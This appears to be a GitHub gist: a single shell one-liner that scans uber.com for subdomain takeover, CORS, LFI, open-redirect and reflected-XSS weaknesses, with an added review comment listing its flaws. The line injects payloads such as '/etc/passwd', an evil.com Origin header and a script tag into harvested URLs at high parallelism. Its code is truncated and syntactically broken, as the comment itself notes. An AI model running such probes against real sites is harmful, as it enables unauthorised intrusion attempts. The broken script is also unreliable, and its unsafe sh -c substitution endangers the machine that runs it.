
@JoyGhoshs
Last active December 7, 2021 09:16
# Recon-and-probe one-liner: enumerates subdomains of $target, then chains a
# series of unauthenticated checks (TLS heartbeat extension, subdomain
# takeover, HTTP probing, archived-URL collection, CORS, LFI, open redirect,
# reflected XSS). Intermediate lists are written to the current directory:
# subdomains, takeover, hosts, pagelinks, combinedfuzz.json.
#
# NOTE(review): the line is not runnable as captured here.
#   - It is cut off mid-string at the end (`\03` inside an unterminated double
#     quote), so the tail of the XSS stage is missing.
#   - Heartbeat stage: the `while read line` loop is closed by the first
#     `done`, so openssl sits outside the loop where the loop's $line is not
#     visible, and the second `done` has no loop to close (shell syntax error).
#   - Wayback stage: there is no `;` after the banner string, so
#     `wayback $target` is printed as echo arguments instead of being executed
#     and pagelinks receives only that banner text.
#   - CORS stage: `target=$(curl ...)` is the first stage of a pipeline, so
#     curl's output is captured into the variable and grep reads nothing;
#     `[Potentional CORS Found]echo $url` is not a valid command as written.
#   - XSS stage: `read host do` reads into two variables (host and do).
#
# Limits of what the checks establish:
#   - Matching 'server extension "heartbeat" (id=15)' only shows that the TLS
#     heartbeat extension is offered; it does not test for the Heartbleed
#     memory disclosure. "safe" is printed for any non-match, which includes
#     hosts that could not be reached.
#   - The LFI, open-redirect and XSS stages each rest on one substring match in
#     the response ("root:x", "Location: $LHOST", "<script>confirm(1)"), so a
#     hit is a lead to confirm by hand, not a finding.
#
# Risks to the machine running it:
#   - URLs read from pagelinks come from third-party archive data and are
#     substituted by `xargs -I` straight into a `sh -c` command string, so
#     shell metacharacters inside a URL are interpreted by the local shell.
#   - $target, $line and $url are expanded unquoted, and `read` is used
#     without -r.
#   - `curl --insecure` turns off TLS certificate verification.
#   - The subjack fingerprint file is a hard-coded path under ~/go/src.
#
# Server-side footprint (for log / WAF review): requests carrying
# `Origin: https://evil.com`, and query-string values rewritten to
# `/etc/passwd`, `http://localhost` or `"><script>confirm(1)</script>`,
# issued up to 25 at a time (`xargs -P 25`).
target=uber.com ; echo "SCANNING FOR SUBDOMAINS " ;assetfinder --subs-only $target | tee subdomains ;echo "SCANING FOR HEARTBLEED VULNERABILITY " ;cat subdomains | while read line ; do echo "QUIT";done | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done;echo "SCANNING FOR SUBDOMAIN TAKEOVER VULNERABILITY";subjack -w subdomains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 |tee takeover ;echo "HTTPROBE FOR HTTP/HTTPS";cat subdomains |httprobe|tee hosts;echo "EXTRACTING PAGE LINKS WAYBACKURL" wayback $target |tee pagelinks;echo "CHECKING FOR CORS MISCONFIGURATION"; gau $target | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done;echo "CHEAKING FOR LFI";cat pagelinks|gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"';echo "CHEAKING FOR OPENREDIRECTS";export LHOST="http://localhost";cat pagelinks|gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"';echo "CHEAKING FOR COMMON XSS" ;cat pagelinks | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace '"><script>confirm(1)</script>' |tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qa "<script>confirm(1)" && echo -e "$host \033[0;31mVulnerable" || echo -e "$host \033[0;32mNotVulnerable \03